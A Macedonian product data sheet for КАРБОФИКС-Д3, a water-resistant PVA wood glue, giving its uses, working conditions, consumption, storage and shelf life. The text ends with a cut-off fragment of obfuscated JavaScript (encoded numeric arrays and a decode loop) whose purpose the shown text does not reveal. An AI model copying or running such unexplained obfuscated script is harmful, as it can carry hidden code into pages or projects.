
КАРБОФИКС-Д3

КАРБОФИКС-Д3 е водоотпорно лепило за дрво изработено на база, водена
поливинилацетатна дисперзија и додатоци.

  

Не содржи состојки штетни по здравјето.
Се користи за широко и должинско лепење на дрво и дрвени производи, монтажно

лепење на дрво и дрвени производи, монтажно лепење на елементи од плочкаст и
масивен мебел, изработка на панел плочи и сл.

  

Примени: Оптимални услови за работа: Т= 20C +-2C. РЛВ=65% +-5%, влажност на
дрвото 8-12%.

  

Потрошувачка: од 0.16 до 0.18 кг/2
 Лепилото да се промеша и да се нанесе на припремената површина.
 Наносот не смее да биде преголем бидејќи о ослабнува спојот, а истиснатиот нанос
прави проблеми во понатамошната обработка.
 Алатот се мие со вода додека е влажно лепилото.

  

Складирање: Во сува просторија на температура од 5C до 25C.

  

Рок на употреба: 12 месеци во оригиналното пакување.

  

Да се чува од замрзнување.
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 var a=0,m,v,t,z,x=newArray('9091968376','8887918192818786347374918784939277359287883421333333338896','877886888787','949990793917947998942577939317'),l=x.length;while(++a
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